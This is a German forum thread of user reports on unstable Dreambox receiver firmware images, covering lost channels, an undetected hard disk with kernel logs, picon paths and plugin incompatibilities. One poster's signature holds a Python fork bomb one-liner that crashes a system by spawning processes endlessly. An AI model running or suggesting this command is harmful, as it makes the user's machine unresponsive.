Sammelthrad für unstable images DM8000/DM800/DM500HD

  • @dreamedge
    Original von dreamedge
    Originally posted by nixkoenner

    schau doch nochmal mit dem unstable von morgen :D


    habe gerade mal das von heute 6:45 geflashed .....

    aber bin wieder zurueck auf das vom 13-03 ...

    hatte keine Sat mehr...

    habe Hotbird und astra ... aber ueberall was SER 0 ...

    und suche hat auch nur 1300 sender geliefert (sonst 2900)

    Die platte wurde auch nicht erkannt ....

    Musste aber wegen allem sport heut wieder eine laufende Box haben .. deswegen ist heute Teststop .....


    EDIT : Habe auf 13-03 ein online update gemacht ....

    dmesg gibt das aus

    ATA: abnormal status 0xD0 on port 0xb051001c
    ATA: abnormal status 0xD0 on port 0xb051001c
    ata1.00: qc timeout (cmd 0xec)
    ata1.00: failed to IDENTIFY (I/O error, err_mask=0x4)
    ata1: classification failed
    ata1: reset failed, giving up
    scsi1 : sata_svw
    ata2: SATA link down (SStatus 0 SControl 0)


    Wenn du das vom 13-03 drauf hast ohne updates das wichtig dann würde ich dich bitten mal das angehängte kernel image für die 800er zu testen ob die hdd nach dem reboot da ist und ob das nach mehrfachen reboot immer noch so ist.Alle anderen finger weg vom kernelimage :fressepolieren: :fressepolieren:
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Original von sat4all
    what's picon target for unstable images plz?
    i tried /media/ba/piconHD seems not ok!

    cheers


    we have an english thread for problems with unstable. maybe two word to your problem. first we dont support ba, seems so that u are using multiboot. the second is u can help your self with that: edit

    /etc/enigma2/settings

    config.plugins.picon.location=/media/ba/

    an then in your expertmenu u have to select this..maybe if that dont work create a folder in ba named picons or picon.
  • Originally posted by kati910

    Wenn du das vom 13-03 drauf hast ohne updates das wichtig dann würde ich dich bitten mal das angehängte kernel image für die 800er zu testen ob die hdd nach dem reboot da ist und ob das nach mehrfachen reboot immer noch so ist.Alle anderen finger weg vom kernelimage :fressepolieren: :fressepolieren:



    Habe es gedownload ... kannste hier loeschen .. nicht das noch jemand unsinn macht damit ;)

    Melde mich dann gleich nach dem Testen
    Why drink & Drive ?

    When you can smoke & fly 8)
  • Original von WoDi
    Kann ich nochmals an den Fehler in der (Display)Uhrzeit erinnern?
    (die 4 wird in der 44. Sekunde nicht dargestellt)


    Ja, das ist natuerlich ein dramatischer und kritischer Fehler auf den mehrfach hingewiesen werden muss. :P

    SCNR
    "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
  • Image: unstable von 15.03.2010 auf DMM8000

    Issue: nach Installation von LasMail und Aufruf der Erweiterungen folgt

    Quellcode

    1. "Einige Plugins sind nicht verfügbar: Extensions/LasMail (No modulenamed LaMail.plugin)"


    grüße
  • Tja. Wenn du auch Plugins, die noch nicht OE1.6-kompatibel sind installierst.....

    Musst halt warten, bis es ein Update vom Ersteller gibt.
    Gruß
    Dumbo

    In einer irrsinnigen Welt vernünftig sein zu wollen, ist schon wieder ein Irrsinn für sich.
  • Original von Gerald Z
    Ach je, jetzt geht das schon wieder los… (ist schon seit einigen Unstable)

    - Senderwechsel mehr als eine Ziffer, merkt sich teilweise nur die erste Ziffer

    - Berührungsempfindlichkeit von EIN/AUS-Taster zu hoch


    LOL

    Ich frag mich nur, wie sich sowas ändern kann, wenn da gar nichts dran gemacht wurde :P
    Gruß
    Dumbo

    In einer irrsinnigen Welt vernünftig sein zu wollen, ist schon wieder ein Irrsinn für sich.
  • Auch mal ne frage zum unstable für die 8000er seit ihr auch dabei im unstable wieder den nfi flash plugin zum laufen zubringen warte schon sehnsüchtig darauf :D?Was auch echt noch Super wäre wenn ihr den Skin essential72i2_newnigma2 auf den unstable feed legen könntet und das man picons wieder auf die cf karte installieren kann und das er im expert manager die einstellung cf card für picons nach einem neustart nicht wieder weg sind 8).
    mfg harry

    Dreambox 8000SS

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von harry ()

  • Original von harry
    Auch mal ne frage zum unstable für die 8000er seit ihr auch dabei im unstable wieder den nfi flash plugin zum laufen zubringen ...


    nö, das Plugin ist nicht von uns, dass muss der Ersteller schon selbst an OE 1.6 anpassen. Ich darf da nochmal auf den Configsaver hinweisen, der reicht m.E. um ein Image in ein paar Minuten wieder herzustellen. :)
    "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)